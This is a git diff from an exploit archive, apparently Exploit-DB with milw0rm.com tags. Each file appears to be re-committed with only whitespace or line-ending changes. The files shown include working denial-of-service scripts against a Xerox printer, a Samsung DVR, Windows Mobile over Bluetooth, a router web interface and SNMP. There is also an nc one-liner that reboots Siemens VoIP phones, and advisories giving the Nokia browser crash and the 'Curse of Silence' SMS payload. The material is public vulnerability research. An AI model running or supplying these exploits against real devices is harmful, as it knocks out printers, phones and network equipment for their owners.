|| inet_addr(daddr) == -1) + erexit("Invalid source/destination IP address\n"); + + if (saddr == NULL) { usage(); erexit("No Source Address"); } + if (daddr == NULL) { usage(); erexit("No Dest Address"); } + + sock = socket(AF_INET,SOCK_RAW,IPPROTO_RAW); + if (sock == -1) + erexit("Couldnt open Raw socket!(Are you root?)\n"); + + lsaddr = inet_addr(saddr); + ldaddr = inet_addr(daddr); + + buf = makereq(community,&size); + + sendudp(sock,&lsaddr,&ldaddr,32788,161,buf,size); + fprintf(stdout,"Sent packet. SNMPd must be down.\n"); + return 0; + +} + +// milw0rm.com [2008-02-03] diff --git a/platforms/hardware/dos/59.c b/platforms/hardware/dos/59.c index d9b82d78e..97e9a2f83 100755 --- a/platforms/hardware/dos/59.c +++ b/platforms/hardware/dos/59.c @@ -125,6 +125,6 @@ ls.packets_sent, ls.packet_errors, ls.bytes_written); CLEANUP; return (0); -} - -// milw0rm.com [2003-07-18] +} + +// milw0rm.com [2003-07-18] diff --git a/platforms/hardware/dos/60.c b/platforms/hardware/dos/60.c index d117653ea..cdfd018a7 100755 --- a/platforms/hardware/dos/60.c +++ b/platforms/hardware/dos/60.c @@ -208,6 +208,6 @@ sum += (sum >> 16); /* add carry */ answer = ~sum; /* truncate to 16 bits */ return(answer); } - - -// milw0rm.com [2003-07-21] + + +// milw0rm.com [2003-07-21] diff --git a/platforms/hardware/dos/6196.pl b/platforms/hardware/dos/6196.pl index 0f2f4f280..fede1afcb 100755 --- a/platforms/hardware/dos/6196.pl +++ b/platforms/hardware/dos/6196.pl @@ -1,37 +1,37 @@ -#!/usr/bin/perl -# carved-out by: crit3rion, just making th3 world a b3tt3r plac3! -# Xerox_Remote_DoS.20080801.ver01 (tanx to dr0pz0N3 for reminding me to close my #$*&*! s0ck3t) -# Make: Xerox -# Model: Phaser 8400 -# Firmware: 03/03/2004 -# -# What's the deal? -# Apparently, if you send an empty packet to a Xerox Phaser 8400 printer -# the printer will reboot. Tested successfully on four printers. -# - -# Let's not leave our maliciousness open to exploitation and errors! -use strict; -use warnings; -use IO::Socket::INET; - -# What's your printer's IP Address? -print "Please enter the printers IP:\n"; -my $ipaddr = ; -chomp $ipaddr; - -# Let's setup the connection... -my $socket = IO::Socket::INET->new( - PeerPort => 1900, - PeerAddr => $ipaddr, - Proto => "udp" ) - or die "I tried. Maybe you entered the wrong IP?\n Maybe it's just my bad code...\n In any case, check: $@\n\n"; - -# Okay... Let's kill it. -$socket->send(""); -$socket->close(); - -print "Done. It should have died.\n\n"; -exit(1); - -# milw0rm.com [2008-08-03] +#!/usr/bin/perl +# carved-out by: crit3rion, just making th3 world a b3tt3r plac3! +# Xerox_Remote_DoS.20080801.ver01 (tanx to dr0pz0N3 for reminding me to close my #$*&*! s0ck3t) +# Make: Xerox +# Model: Phaser 8400 +# Firmware: 03/03/2004 +# +# What's the deal? +# Apparently, if you send an empty packet to a Xerox Phaser 8400 printer +# the printer will reboot. Tested successfully on four printers. +# + +# Let's not leave our maliciousness open to exploitation and errors! +use strict; +use warnings; +use IO::Socket::INET; + +# What's your printer's IP Address? +print "Please enter the printers IP:\n"; +my $ipaddr = ; +chomp $ipaddr; + +# Let's setup the connection... +my $socket = IO::Socket::INET->new( + PeerPort => 1900, + PeerAddr => $ipaddr, + Proto => "udp" ) + or die "I tried. Maybe you entered the wrong IP?\n Maybe it's just my bad code...\n In any case, check: $@\n\n"; + +# Okay... Let's kill it. +$socket->send(""); +$socket->close(); + +print "Done. It should have died.\n\n"; +exit(1); + +# milw0rm.com [2008-08-03] diff --git a/platforms/hardware/dos/62.sh b/platforms/hardware/dos/62.sh index 1a09e6b4b..9a29c740e 100755 --- a/platforms/hardware/dos/62.sh +++ b/platforms/hardware/dos/62.sh @@ -45,6 +45,6 @@ endif foreach protocol (53) /usr/local/sbin/hping $1 --rawip --rand-source --ttl $2 --ipproto $protocol --count 76 --interval u250 --data 26 -end - -# milw0rm.com [2003-07-22] +end + +# milw0rm.com [2003-07-22] diff --git a/platforms/hardware/dos/6394.pl b/platforms/hardware/dos/6394.pl index 5c096c302..f16ebc113 100755 --- a/platforms/hardware/dos/6394.pl +++ b/platforms/hardware/dos/6394.pl @@ -1,91 +1,91 @@ -#!/usr/bin/perl -w -# -# Samsung DVR SHR2040 HTTPD Remote Denial of Service DoS PoC -# -# The vulnerability is caused due to an unspecified error in the cgis -# files filter used for configure propierties. This can be exploited by -# sending a specially crafted HTTP request (NO necessary authentication), -# which will cause the HTTP service on the system to crash. -# -# Requisites: Test default ports: -# -# PORT STATE SERVICE -# 554/tcp open rtsp -# 557/tcp open openvms-sysipc -# -# The vulnerability has been reported in versions Samsung DVR -# -# Firmware Version B3.03E-K1.53-V2.19_0705281908, Model = SHR2040 -# -# More information: http://www.samsung.com -# http://www.sybsecurity.com -# -# Very special credits: str0ke, Kf, rathaous, !dsr, 0dd. -# -# and friends: nitr0us, crypkey, dex, xdawn, sirdarckcat, kuza55, -# pikah, codebreak, h3llfyr3, canit0. -# -# Alex Hernandez ahernandez [at] sybsecurity dot com -# - -use strict; -use LWP; -use Data::Dumper; -require HTTP::Request; -require HTTP::Headers; - -my $string = "/x"; # Strings to send -my $method = 'GET'; # Method "GET" or "POST" -my $uri = 'http://10.50.10.248:557'; # IP address:port (change this) -my $content = "/test.html"; # Paths to crash - -#my $content = "/first.htm"; -#my $content = "/content_frame.htm?cgiName="; -#my $content = "/index_menu.htm?lang=en&topMenu="; - -my $headers = HTTP::Headers->new( - -'Accept:' => '*/*', -'Referer:' => 'http://$1$9hC8DmrL$8NG8i3pQXBabAKo.AIm8U.:12345@10.50.10.248:557', -'Accept-Language:' => 'en-us,en;q=0.5', -'UA-CPU:' => 'x86', -'Accept-Encoding:' => 'gzip, deflate', -'User-Agent:' => 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)', -'Host:' => '10.50.10.248:557', -'Connection' => 'keep-alive', -'Authorization:' => 'Basic JDEkOWhDOERtckwkOE5HOGkzcFFYQmFiQUtvLkFJbThVLjoxMjM0NQ==', # base64 encode ADMIN:12345 - -); - -my $request = HTTP::Request->new($method, $uri, $headers, $content, $string); - -my $ua = LWP::UserAgent->new; -my $response = $ua->request($request); - -print "[+] Denial of Service exploit for Samsung SHR2040 Final\n"; -print "[+] Coded by: Alex Hernandez [ahernandez\@sybsecurity.com]\n"; -print "[+] We got this response from DVR: \n\n" . $response->content . "\n"; - -my $data; - foreach my $pair (split('&', $response->content)) { - my ($k, $v) = split('=', $pair); - $data->{$k} = $v; -} - -if ($data->{RESULT} != 0) { - - print "[+] Denial of Service exploit for Samsung SHR2040 Final\n"; - print "[+] Coded by: Alex Hernandez[ahernandez\@sybsecurity.com]\n"; - print "[+] Use:\n"; - print "\tperl -x dos_dvrsamsung.pl\n"; - print $data->{RESPMSG} . "\n"; - exit(0); - -} else { - - print "[+] Denial of service Exploit successed!!!\n"; - print "[+] By Alex Hernandez[ahernandez\@sybsecurity.com]\n"; - -} - -# milw0rm.com [2008-09-07] +#!/usr/bin/perl -w +# +# Samsung DVR SHR2040 HTTPD Remote Denial of Service DoS PoC +# +# The vulnerability is caused due to an unspecified error in the cgis +# files filter used for configure propierties. This can be exploited by +# sending a specially crafted HTTP request (NO necessary authentication), +# which will cause the HTTP service on the system to crash. +# +# Requisites: Test default ports: +# +# PORT STATE SERVICE +# 554/tcp open rtsp +# 557/tcp open openvms-sysipc +# +# The vulnerability has been reported in versions Samsung DVR +# +# Firmware Version B3.03E-K1.53-V2.19_0705281908, Model = SHR2040 +# +# More information: http://www.samsung.com +# http://www.sybsecurity.com +# +# Very special credits: str0ke, Kf, rathaous, !dsr, 0dd. +# +# and friends: nitr0us, crypkey, dex, xdawn, sirdarckcat, kuza55, +# pikah, codebreak, h3llfyr3, canit0. +# +# Alex Hernandez ahernandez [at] sybsecurity dot com +# + +use strict; +use LWP; +use Data::Dumper; +require HTTP::Request; +require HTTP::Headers; + +my $string = "/x"; # Strings to send +my $method = 'GET'; # Method "GET" or "POST" +my $uri = 'http://10.50.10.248:557'; # IP address:port (change this) +my $content = "/test.html"; # Paths to crash + +#my $content = "/first.htm"; +#my $content = "/content_frame.htm?cgiName="; +#my $content = "/index_menu.htm?lang=en&topMenu="; + +my $headers = HTTP::Headers->new( + +'Accept:' => '*/*', +'Referer:' => 'http://$1$9hC8DmrL$8NG8i3pQXBabAKo.AIm8U.:12345@10.50.10.248:557', +'Accept-Language:' => 'en-us,en;q=0.5', +'UA-CPU:' => 'x86', +'Accept-Encoding:' => 'gzip, deflate', +'User-Agent:' => 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)', +'Host:' => '10.50.10.248:557', +'Connection' => 'keep-alive', +'Authorization:' => 'Basic JDEkOWhDOERtckwkOE5HOGkzcFFYQmFiQUtvLkFJbThVLjoxMjM0NQ==', # base64 encode ADMIN:12345 + +); + +my $request = HTTP::Request->new($method, $uri, $headers, $content, $string); + +my $ua = LWP::UserAgent->new; +my $response = $ua->request($request); + +print "[+] Denial of Service exploit for Samsung SHR2040 Final\n"; +print "[+] Coded by: Alex Hernandez [ahernandez\@sybsecurity.com]\n"; +print "[+] We got this response from DVR: \n\n" . $response->content . "\n"; + +my $data; + foreach my $pair (split('&', $response->content)) { + my ($k, $v) = split('=', $pair); + $data->{$k} = $v; +} + +if ($data->{RESULT} != 0) { + + print "[+] Denial of Service exploit for Samsung SHR2040 Final\n"; + print "[+] Coded by: Alex Hernandez[ahernandez\@sybsecurity.com]\n"; + print "[+] Use:\n"; + print "\tperl -x dos_dvrsamsung.pl\n"; + print $data->{RESPMSG} . "\n"; + exit(0); + +} else { + + print "[+] Denial of service Exploit successed!!!\n"; + print "[+] By Alex Hernandez[ahernandez\@sybsecurity.com]\n"; + +} + +# milw0rm.com [2008-09-07] diff --git a/platforms/hardware/dos/6582.pl b/platforms/hardware/dos/6582.pl index c3e622e8a..a14b13476 100755 --- a/platforms/hardware/dos/6582.pl +++ b/platforms/hardware/dos/6582.pl @@ -1,44 +1,44 @@ -#!/usr/bin/perl -# -# ----------WM6 remote overflow reboot PoC---------- -# Simple exploit for remote rebooting a windows mobile device -# Maybe we can use it for doing command execution, -# I've not test it since the device is rebooting and do not dump a core -# for further analysing. -# -# The bug is not realy in the long string name but when it's the first -# time the wm6 device try to get a connection with too long name. -# -# There's two way to exploit this bug, this PoC show the first method -# (direct connect to the device if we know the bdaddr) but you can -# just wait for the device to search and overflow by itself when -# seeing the hci name: -# hciconfig name `perl -e 'print "A"x90000'` -# hciconfig piscan -# You just have to wait until the wm device search for bluetooth devices -# in range and it will be overflowed -# -# *Tested on WM6 fully patched on [HTC wiza 200],[HTC Mda 8125] -# (by Julien Bedard) -# - -use Net::Bluetooth; - -$target=$ARGV[0]; -$hci_dev=$ARGV[1]; -$overflow="A" x 90000; -$rfcomm_port="3"; - -if (@ARGV < 2) -{ -die "Usage:\n ./wm6_dos.pl \n\n"; -} - -# change this lame cmd ??? -system("hciconfig $hci_dev name $overflow"); - -$over_conn = Net::Bluetooth->newsocket("RFCOMM"); -print "socket error $!\n" unless(defined($over_conn)); -$over_conn->connect($target, $rfcomm_port); - -# milw0rm.com [2008-09-26] +#!/usr/bin/perl +# +# ----------WM6 remote overflow reboot PoC---------- +# Simple exploit for remote rebooting a windows mobile device +# Maybe we can use it for doing command execution, +# I've not test it since the device is rebooting and do not dump a core +# for further analysing. +# +# The bug is not realy in the long string name but when it's the first +# time the wm6 device try to get a connection with too long name. +# +# There's two way to exploit this bug, this PoC show the first method +# (direct connect to the device if we know the bdaddr) but you can +# just wait for the device to search and overflow by itself when +# seeing the hci name: +# hciconfig name `perl -e 'print "A"x90000'` +# hciconfig piscan +# You just have to wait until the wm device search for bluetooth devices +# in range and it will be overflowed +# +# *Tested on WM6 fully patched on [HTC wiza 200],[HTC Mda 8125] +# (by Julien Bedard) +# + +use Net::Bluetooth; + +$target=$ARGV[0]; +$hci_dev=$ARGV[1]; +$overflow="A" x 90000; +$rfcomm_port="3"; + +if (@ARGV < 2) +{ +die "Usage:\n ./wm6_dos.pl \n\n"; +} + +# change this lame cmd ??? +system("hciconfig $hci_dev name $overflow"); + +$over_conn = Net::Bluetooth->newsocket("RFCOMM"); +print "socket error $!\n" unless(defined($over_conn)); +$over_conn->connect($target, $rfcomm_port); + +# milw0rm.com [2008-09-26] diff --git a/platforms/hardware/dos/6726.txt b/platforms/hardware/dos/6726.txt index 12df72623..6224f0e08 100755 --- a/platforms/hardware/dos/6726.txt +++ b/platforms/hardware/dos/6726.txt @@ -1,103 +1,103 @@ -==================================================== -Security Research Advisory - -Vulnerability name: Nokia Browser Array Sort Denial Of Service Vulnerability -Advisory number: LC-2008-04 -Advisory URL: http://www.ikkisoft.com - -==================================================== -1) Affected Software - -* Nokia Mini Map Browser (S60WebKit <= 21772) - -The tested device has the following User-Agent: -Mozilla/5.0 (SymbianOS/9.2;U;Series60/3.1 NokiaE90-1/210.34.75 -Profile/MIDP-2.0 Configuration/CLDC-1.1) AppleWebKit/413 (KHTML) -Safari/413 - -Note: Although the Nokia Web Browser is built upon a port of the -open source WebKit used by Apple for its browser, the iPhone is not -affected (at least the iPhone firmware version 2.0.2(5C1)) - -==================================================== -2) Severity - -Severity: Low -Local/Remote: Remote - -==================================================== -3) Summary - -The Web Browser for S60 (formally called Nokia Mini Map Browser) is a web -browser for the S60 mobile phone platform developed by Nokia. -It is built upon S60WebKit, a port of the open source WebKit project to the S60 -platform. According to several sources, the S60 software on Symbian OS is the -world’s most popular software for smartphones. - -This version of the Nokia Mini Map Browser does not properly validate JavaScript -input embedded in visited HTML pages. An aggressor can easily trigger Denial of -Service attacks. - -References: -http://opensource.nokia.com/projects/S60browser/ -http://en.wikipedia.org/wiki/Web_Browser_for_S60 - -==================================================== -4) Vulnerability Details - -The Nokia Mini Map Browser is prone to a vulnerability that may result in the -application silent crash. Arbitrary code execution is probably not possible. -The problem arises in the JavaScript core of the S60WebKit, invoking the sort() -function on a recursive array. -A similar behavior was observed some years ago in several browsers due to -the common code base (BID-12331, BID-11762, BID-11760, BID-11759, -BID-11752). - -==================================================== -5) Exploit - -Embed in an HTML page the following JavaScript: - - -==================================================== -6) Fix Information - -n/a - -==================================================== -7) Time Table - -08/09/2008 - Vendor notified. -15/09/2008 - Vendor response. -??/??/???? - Vendor patch release. -10/10/2008 - Public disclosure. - -==================================================== -8) Credits - -Discovered by Luca Carettoni - luca.carettoni[at]ikkisoft[dot]com - -==================================================== -9) Legal Notices - -The information in the advisory is believed to be accurate at the time of -publishing based on currently available information. -This information is provided as-is, as a free service to the community. -There are no warranties with regard to this information. -The author does not accept any liability for any direct, indirect, -or consequential loss or damage arising from use of, or reliance on, -this information. -Permission is hereby granted for the redistribution of this alert, provided -that the content is not altered in any way, except reformatting, and that due -credit is given. - -This vulnerability has been disclosed in accordance with the RFP -Full-Disclosure Policy v2.0, available at: -http://www.wiretrip.net/rfp/policy.html - -==================================================== - -# milw0rm.com [2008-10-10] +==================================================== +Security Research Advisory + +Vulnerability name: Nokia Browser Array Sort Denial Of Service Vulnerability +Advisory number: LC-2008-04 +Advisory URL: http://www.ikkisoft.com + +==================================================== +1) Affected Software + +* Nokia Mini Map Browser (S60WebKit <= 21772) + +The tested device has the following User-Agent: +Mozilla/5.0 (SymbianOS/9.2;U;Series60/3.1 NokiaE90-1/210.34.75 +Profile/MIDP-2.0 Configuration/CLDC-1.1) AppleWebKit/413 (KHTML) +Safari/413 + +Note: Although the Nokia Web Browser is built upon a port of the +open source WebKit used by Apple for its browser, the iPhone is not +affected (at least the iPhone firmware version 2.0.2(5C1)) + +==================================================== +2) Severity + +Severity: Low +Local/Remote: Remote + +==================================================== +3) Summary + +The Web Browser for S60 (formally called Nokia Mini Map Browser) is a web +browser for the S60 mobile phone platform developed by Nokia. +It is built upon S60WebKit, a port of the open source WebKit project to the S60 +platform. According to several sources, the S60 software on Symbian OS is the +world’s most popular software for smartphones. + +This version of the Nokia Mini Map Browser does not properly validate JavaScript +input embedded in visited HTML pages. An aggressor can easily trigger Denial of +Service attacks. + +References: +http://opensource.nokia.com/projects/S60browser/ +http://en.wikipedia.org/wiki/Web_Browser_for_S60 + +==================================================== +4) Vulnerability Details + +The Nokia Mini Map Browser is prone to a vulnerability that may result in the +application silent crash. Arbitrary code execution is probably not possible. +The problem arises in the JavaScript core of the S60WebKit, invoking the sort() +function on a recursive array. +A similar behavior was observed some years ago in several browsers due to +the common code base (BID-12331, BID-11762, BID-11760, BID-11759, +BID-11752). + +==================================================== +5) Exploit + +Embed in an HTML page the following JavaScript: + + +==================================================== +6) Fix Information + +n/a + +==================================================== +7) Time Table + +08/09/2008 - Vendor notified. +15/09/2008 - Vendor response. +??/??/???? - Vendor patch release. +10/10/2008 - Public disclosure. + +==================================================== +8) Credits + +Discovered by Luca Carettoni - luca.carettoni[at]ikkisoft[dot]com + +==================================================== +9) Legal Notices + +The information in the advisory is believed to be accurate at the time of +publishing based on currently available information. +This information is provided as-is, as a free service to the community. +There are no warranties with regard to this information. +The author does not accept any liability for any direct, indirect, +or consequential loss or damage arising from use of, or reliance on, +this information. +Permission is hereby granted for the redistribution of this alert, provided +that the content is not altered in any way, except reformatting, and that due +credit is given. + +This vulnerability has been disclosed in accordance with the RFP +Full-Disclosure Policy v2.0, available at: +http://www.wiretrip.net/rfp/policy.html + +==================================================== + +# milw0rm.com [2008-10-10] diff --git a/platforms/hardware/dos/7220.txt b/platforms/hardware/dos/7220.txt index 692861913..908ee8adb 100755 --- a/platforms/hardware/dos/7220.txt +++ b/platforms/hardware/dos/7220.txt @@ -1,16 +1,16 @@ -Hi, - -echo -e "X sip:s X\nFrom:\nTo:\n" | nc -q0 -u 5060 - -Will disconnect all current VOIP and PSTN calls and reboot -the C450IP/C475IP devices. - -Tested with current firmwares. - -Vendor (Siemens) was contacted 11/2007, no fix supplied yet. - -Have phun! - -sky & Any - -# milw0rm.com [2008-11-24] +Hi, + +echo -e "X sip:s X\nFrom:\nTo:\n" | nc -q0 -u 5060 + +Will disconnect all current VOIP and PSTN calls and reboot +the C450IP/C475IP devices. + +Tested with current firmwares. + +Vendor (Siemens) was contacted 11/2007, no fix supplied yet. + +Have phun! + +sky & Any + +# milw0rm.com [2008-11-24] diff --git a/platforms/hardware/dos/7535.php b/platforms/hardware/dos/7535.php index 204e5ae83..a4eacc888 100755 --- a/platforms/hardware/dos/7535.php +++ b/platforms/hardware/dos/7535.php @@ -1,64 +1,64 @@ - nmap 192.168.1.1 -* -* Starting Nmap 4.20 ( http://insecure.org ) at 2008-12-12 12:17 EST -* Interesting ports on 192.168.1.1: -* Not shown: 1695 closed ports -* PORT STATE SERVICE -* 23/tcp open telnet -* 443/tcp open https -* -* Nmap finished: 1 IP address (1 host up) scanned in 7.403 seconds -* -* Looks like HTTP died... -* HTTPS is running however you cannot login. The service is basically useless. -* Telnet is also open for administration (if configured to be). -* -* Apart from not being able to use the Web Administration Interface the device -* seems to function fine. -*/ - -set_time_limit(0); - -$host = "192.168.1.1"; //Default IP is 192.168.1.1 -if (isset($argv[1])) - $host = $argv[1]; -$port = 80; - -echo "Connecting...\n"; -$conn = fsockopen($host, $port, $errno, $errstr); -if ($conn) -{ - $payload = "GET /".str_repeat('A', 10240)." HTTP/1.1"; - - if (fwrite($conn, $payload)) - echo "Payload sent!\n"; - - fclose($conn); -} -?> - -# milw0rm.com [2008-12-21] + nmap 192.168.1.1 +* +* Starting Nmap 4.20 ( http://insecure.org ) at 2008-12-12 12:17 EST +* Interesting ports on 192.168.1.1: +* Not shown: 1695 closed ports +* PORT STATE SERVICE +* 23/tcp open telnet +* 443/tcp open https +* +* Nmap finished: 1 IP address (1 host up) scanned in 7.403 seconds +* +* Looks like HTTP died... +* HTTPS is running however you cannot login. The service is basically useless. +* Telnet is also open for administration (if configured to be). +* +* Apart from not being able to use the Web Administration Interface the device +* seems to function fine. +*/ + +set_time_limit(0); + +$host = "192.168.1.1"; //Default IP is 192.168.1.1 +if (isset($argv[1])) + $host = $argv[1]; +$port = 80; + +echo "Connecting...\n"; +$conn = fsockopen($host, $port, $errno, $errstr); +if ($conn) +{ + $payload = "GET /".str_repeat('A', 10240)." HTTP/1.1"; + + if (fwrite($conn, $payload)) + echo "Payload sent!\n"; + + fclose($conn); +} +?> + +# milw0rm.com [2008-12-21] diff --git a/platforms/hardware/dos/7632.txt b/platforms/hardware/dos/7632.txt index 541d53a85..c9b7eff0f 100755 --- a/platforms/hardware/dos/7632.txt +++ b/platforms/hardware/dos/7632.txt @@ -1,228 +1,228 @@ -Vulnerability Advisory -====================== - -Remote SMS/MMS Denial of Service - "Curse Of Silence" -for Nokia S60 phones - - -URL -=== - -https://berlin.ccc.de/~tobias/cos/s60-curse-of-silence-advisory.txt - - -Video -===== - -https://berlin.ccc.de/~tobias/cos/s60-curse-of-silence-demo.avi - - -Affected Products -================= - -All Nokia Series60 2.6, 2.8, 3.0, 3.1 devices, see detailed list at -the end of the document. - - -Requirements to Execute Attack -============================== - -- MSISDN of the target -- mobile phone contract that allows sending of SMS messages -- (almost) any Nokia phone (or some other means of sending SMS - messages with TP-PID set to "Internet Electronic Mail") - - -Risk Level -========== - -Medium (for S60 2.8 and 3.1 devices): Target will not be able to -receive any SMS or MMS messages while the attack is ongoing. After -that, only very limited message receiving is possible until the device -is Factory Resetted - -High (for S60 2.6 and 3.0 devices): Target will not be able to receive -any SMS or MMS messages until the device is Factory Resetted - - -Summary -======= - -Emails can be sent via SMS by setting the messages Protocol Identifier -to "Internet Electronic Mail" and formatting the message like this: - - - -If such messages contain an with more than 32 -characters, S60 2.6, 2.8, 3.0 and 3.1 devices are not able to receive -other SMS or MMS messages anymore. 2.6 and 3.0 devices lock up after -only one message, 2.8 and 3.1 devices after 11 messages. - - -Details -======= - -3GPP TS 23.040 specifies a method for sending emails via SMS in -section 3.8 ("SMS and Internet Electronic Mail interworking"). In its -most basic form, such a SMS message starts with the from- (MT-SMS) or -to-email-address (MO-SMS), followed by a space character, and then the -message body. The TP-Procotol-Identifier of the SMS message has to be -set to "Internet Electronic Mail" (value: 50 / 0x32). - -It is not specified how such a message should be displayed when -received by the phone. Before S60 2.6, Series60 devices displayed such -messages exactly as they were sent. Starting with S60 2.6, when the -part of the message that should contain the from-address looks -anything like an email address (i.e. it contains an "@" somewhere), -this address is then displayed as the message sender instead of the -usually shown TP-Originating-Address. - -If this email address is longer than 32 characters, Series60 2.6, 2.8, -3.0 and 3.1 devices fail to display the message or give any indication -on the user interface that such a message has been received. They do, -however, signal to the SMSC that they received the message by sending -an RP-ACK. - -Devices running S60 2.6 or 3.0 will not be able to receive any other -SMS message after that. The user interface does not give any -indication of this situation. The only action to remedy this situation -seems to be a Factory Reset of the device (by entering "*#7370#"). - -Devices running S60 2.8 or 3.1 react a little different: They do not -lock up until they received at least 11 SMS-email messages with an -email address that is longer than 32 characters. The device will not -be able to receive any other SMS message after that - upon receiving -the next message, the phone will just display a warning that there is -not enough memory to receive further messages and that data should be -deleted first. This message is even displayed on an otherwise -completely "empty" device. - -After switching the phone off and on again, it has limited capability -for receiving SMS messages again: If it receives a SMS message that is -split up into several parts (3GPP TS 23.040, 9.2.3.24.1 Concatenated -Short Messages) it is only able to receive the first part and will -display the "not enough memory" warning again. After powercycling the -device again, it can then receive the second part. If there is a third -part, it has to be powercycled again, and so on. - -Also, an attacker now just needs to send one more "Curse Of Silence" -message to lock the phone up again. By always sending yet another one -as soon as the status report for delivery of the previous message is -received, the attacker could completely prevent a target from -receiving any other SMS/MMS messages. - -Only Factory Resetting the device will restore its full message -receiving capabilities. Note that, if a backup is made using Nokia -PC-Suite *after* being attacked, the blocking messages are also -backuped and will be sent to the device again when restoring the -backup after the Factory Reset. - -Note that not being able to receive SMS messages also means not being -able to receive MMS messages, since they are signalled by sending an -SMS message to the device. - -"Curse Of Silence" messages can be generated with any phone or -cellular modem that supports 3GPP TS 27.005 AT commands and with most -Nokia phones also directly from the user interface. For example, on -S60 devices, when in the message editor, the type of the message can -be switched to "E-mail" under "Options" -> "Sending options" -> -"Message sent as". The 6310i conveniently offers a "Write email" menu -entry in the messaging menu. - -The simplest form of content for a Curse Of Silence would be something -like "123456789@123456789.1234567890123 " (the digits are used only to -illustrate the length of the "email address" of more than 32 -characters). Note the space at the end of the message! - - -Workaround -========== - -None known for the user side. - -Until a firmware fix is available, network operators should filter -messages with TP-PID "Internet Electronic Mail" and an email address -of more than 32 characters or reset the TP-PID of these messages to 0. - - -Credits -======= - -Tobias Engel -November 9, 2008 - -Many thanks to Frank Rieger for spending countless hours cutting and -editing the video. - - -Detailed List of Affected Products -================================== - -Tested on several S60 2.6, 3.0 and 3.1 devices. Since the vulnerable -component is a S60 base functionality, it seems safe to assume that -all devices with these OS versions are affected. - -S60 3rd Edition, Feature Pack 1 (S60 3.1): -Nokia E90 Communicator -Nokia E71 -Nokia E66 -Nokia E51 -Nokia N95 8GB -Nokia N95 -Nokia N82 -Nokia N81 8GB -Nokia N81 -Nokia N76 -Nokia 6290 -Nokia 6124 classic -Nokia 6121 classic -Nokia 6120 classic -Nokia 6110 Navigator -Nokia 5700 XpressMusic - -S60 3rd Edition, initial release (S60 3.0): -Nokia E70 -Nokia E65 -Nokia E62 -Nokia E61i -Nokia E61 -Nokia E60 -Nokia E50 -Nokia N93i -Nokia N93 -Nokia N92 -Nokia N91 8GB -Nokia N91 -Nokia N80 -Nokia N77 -Nokia N73 -Nokia N71 -Nokia 5500 -Nokia 3250 - -S60 2nd Edition, Feature Pack 3 (S60 2.8): -Nokia N90 -Nokia N72 -Nokia N70 - -S60 2nd Edition, Feature Pack 2 (S60 2.6): -Nokia 6682 -Nokia 6681 -Nokia 6680 -Nokia 6630 - - -Change History -============== - -December 30, 2008: -Removed auth details since they are no longer required - -December 21, 2008: -Corrected version numbers for S60 2nd Edition - -December 13, 2008: -S60 2.8 devices react like S60 3.1 devices, not like S60 2.6 or 3.0 -devices - -# milw0rm.com [2009-01-01] +Vulnerability Advisory +====================== + +Remote SMS/MMS Denial of Service - "Curse Of Silence" +for Nokia S60 phones + + +URL +=== + +https://berlin.ccc.de/~tobias/cos/s60-curse-of-silence-advisory.txt + + +Video +===== + +https://berlin.ccc.de/~tobias/cos/s60-curse-of-silence-demo.avi + + +Affected Products +================= + +All Nokia Series60 2.6, 2.8, 3.0, 3.1 devices, see detailed list at +the end of the document. + + +Requirements to Execute Attack +============================== + +- MSISDN of the target +- mobile phone contract that allows sending of SMS messages +- (almost) any Nokia phone (or some other means of sending SMS + messages with TP-PID set to "Internet Electronic Mail") + + +Risk Level +========== + +Medium (for S60 2.8 and 3.1 devices): Target will not be able to +receive any SMS or MMS messages while the attack is ongoing. After +that, only very limited message receiving is possible until the device +is Factory Resetted + +High (for S60 2.6 and 3.0 devices): Target will not be able to receive +any SMS or MMS messages until the device is Factory Resetted + + +Summary +======= + +Emails can be sent via SMS by setting the messages Protocol Identifier +to "Internet Electronic Mail" and formatting the message like this: + + + +If such messages contain an with more than 32 +characters, S60 2.6, 2.8, 3.0 and 3.1 devices are not able to receive +other SMS or MMS messages anymore. 2.6 and 3.0 devices lock up after +only one message, 2.8 and 3.1 devices after 11 messages. + + +Details +======= + +3GPP TS 23.040 specifies a method for sending emails via SMS in +section 3.8 ("SMS and Internet Electronic Mail interworking"). In its +most basic form, such a SMS message starts with the from- (MT-SMS) or +to-email-address (MO-SMS), followed by a space character, and then the +message body. The TP-Procotol-Identifier of the SMS message has to be +set to "Internet Electronic Mail" (value: 50 / 0x32). + +It is not specified how such a message should be displayed when +received by the phone. Before S60 2.6, Series60 devices displayed such +messages exactly as they were sent. Starting with S60 2.6, when the +part of the message that should contain the from-address looks +anything like an email address (i.e. it contains an "@" somewhere), +this address is then displayed as the message sender instead of the +usually shown TP-Originating-Address. + +If this email address is longer than 32 characters, Series60 2.6, 2.8, +3.0 and 3.1 devices fail to display the message or give any indication +on the user interface that such a message has been received. They do, +however, signal to the SMSC that they received the message by sending +an RP-ACK. + +Devices running S60 2.6 or 3.0 will not be able to receive any other +SMS message after that. The user interface does not give any +indication of this situation. The only action to remedy this situation +seems to be a Factory Reset of the device (by entering "*#7370#"). + +Devices running S60 2.8 or 3.1 react a little different: They do not +lock up until they received at least 11 SMS-email messages with an +email address that is longer than 32 characters. The device will not +be able to receive any other SMS message after that - upon receiving +the next message, the phone will just display a warning that there is +not enough memory to receive further messages and that data should be +deleted first. This message is even displayed on an otherwise +completely "empty" device. + +After switching the phone off and on again, it has limited capability +for receiving SMS messages again: If it receives a SMS message that is +split up into several parts (3GPP TS 23.040, 9.2.3.24.1 Concatenated +Short Messages) it is only able to receive the first part and will +display the "not enough memory" warning again. After powercycling the +device again, it can then receive the second part. If there is a third +part, it has to be powercycled again, and so on. + +Also, an attacker now just needs to send one more "Curse Of Silence" +message to lock the phone up again. By always sending yet another one +as soon as the status report for delivery of the previous message is +received, the attacker could completely prevent a target from +receiving any other SMS/MMS messages. + +Only Factory Resetting the device will restore its full message +receiving capabilities. Note that, if a backup is made using Nokia +PC-Suite *after* being attacked, the blocking messages are also +backuped and will be sent to the device again when restoring the +backup after the Factory Reset. + +Note that not being able to receive SMS messages also means not being +able to receive MMS messages, since they are signalled by sending an +SMS message to the device. + +"Curse Of Silence" messages can be generated with any phone or +cellular modem that supports 3GPP TS 27.005 AT commands and with most +Nokia phones also directly from the user interface. For example, on +S60 devices, when in the message editor, the type of the message can +be switched to "E-mail" under "Options" -> "Sending options" -> +"Message sent as". The 6310i conveniently offers a "Write email" menu +entry in the messaging menu. 